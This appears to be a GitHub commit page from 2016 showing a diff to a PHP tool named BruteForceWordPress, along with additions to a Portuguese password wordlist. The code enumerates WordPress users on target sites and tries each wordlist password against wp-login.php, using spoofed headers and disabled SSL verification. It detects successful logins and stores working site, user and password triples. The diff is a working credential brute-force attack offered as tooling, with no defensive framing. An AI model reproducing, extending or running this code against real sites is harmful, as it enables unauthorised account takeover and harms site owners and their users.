all correctly for first version

aszone · Oct 2, 2016 · 1b62bfb · 1b62bfb
1 parent ed1b3ff
commit 1b62bfb
Show file tree

Hide file tree

Showing 3 changed files with 49 additions and 28 deletions.
diff --git a/index.php b/index.php
diff --git a/src/BruteForceWordPress.php b/src/BruteForceWordPress.php
@@ -27,11 +27,14 @@ class BruteForceWordPress
 
     public $folderDownload;
 
+    public $wp;
+
     public function __construct($commandData)
     {
 
         $this->commandData = array_merge($this->defaultEnterData(), $commandData);
         $this->folderDownload = __DIR__."/../../../../results/exploits/wordpress/";
+        $this->wp = new WordPress();
 
     }
 
@@ -50,20 +53,38 @@ private function defaultEnterData()
     public function execute($sites= array()){
 
         $wordlists = $this->getWordListInArray();
-        $wp = new WordPress();
-        foreach($sites as $site){
+        if(!is_array($sites)){
+            $sites[]=$sites;
+        }
+        foreach($sites as $keySite=>$site){
 
-            $wp->setTarget($site);
-            $users = $wp->getUsers();
+            $this->wp->setTarget($site);
+            $users = $this->wp->getUsers();
+            echo "\ntotal of users: ".count($users)."\n";
+            foreach ($users as $keyUser=>$user){
+                echo $user."\n";
+            }
             foreach ($users as $user){
                 foreach ( $wordlists as $password) {
-                    $this->sendDataToLoginWordPress($user,$password,$site);
-                    echo "site: ".$site;
-                    echo "<br>user: ".$user;
+                    $baseUrlsite=$this->wp->getBaseUrlWordPressByUrl($site);
+                    $checkIfLoginOk=$this->validateLogon($this->sendDataToLoginWordPress($user,$password,$baseUrlsite));
+
+                    echo "\n| site: ".$site;
+                    echo "\n| user: ".$user;
+                    echo "\n| password: ".$password;
+                    echo "\n----------------------------------------------------------";
+                    if($checkIfLoginOk){
+                        $resultsFinal[$keySite.$keyUser]['user']=$user;
+                        $resultsFinal[$keySite.$keyUser]['password']=$password;
+                        $resultsFinal[$keySite.$keyUser]['site']=$site;
+                        echo "\n| login: true";
+                        break;
+                    }
                 }
             }
 
         }
+        return $resultsFinal;
 
     }
 
@@ -75,7 +96,7 @@ public function sendDataToLoginWordPress($username, $password, $target)
             $postdata = 'log='.$username.'&pwd='.$password.'&wp-submit=Log%20In&redirect_to='.$target.'wp-admin/&testcookie=1';
             $ch = \curl_init();
             $header = new FakeHeaders();
-            if ($this->isHttps($target)) {
+            if ($this->wp->isHttps($target)) {
                 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
             }
             curl_setopt($ch, CURLOPT_URL, $target.'wp-login.php');
@@ -140,4 +161,23 @@ public function getWordListInArray($wordlist = '')
         return false;
     }
 
+    public function validateLogon($html)
+    {
+        //var_dump($html['body']);
+        $pos = strpos($html['body'], '<strong>ERRO</strong>');
+        $pos2 = strpos($html['body'], '<strong>ERROR</strong>');
+        $pos3 = strpos($html['body'], 'Account blocked for');
+        $pos4 = strpos($html['status']['url'], 'wp-admin');
+
+        //in future check timeout
+        if (($pos !== false or $pos2 !== false or $pos3 !== false)) {
+            return false;
+        }
+        if ($pos4 === false) {
+            return false;
+        }
+
+        return true;
+    }
+
 }
diff --git a/src/resource/litleWordListPt.txt b/src/resource/litleWordListPt.txt
@@ -1,6 +1,7 @@
 123
 1234
 12345
+010203leite
 123456
 1qa2ws3ed
 1qa2ws
-Original file line number
+Diff line change
@@ -1,6 +1,7 @@
+leite
 qa2ws3ed
 qa2ws
@@ Expand Down @@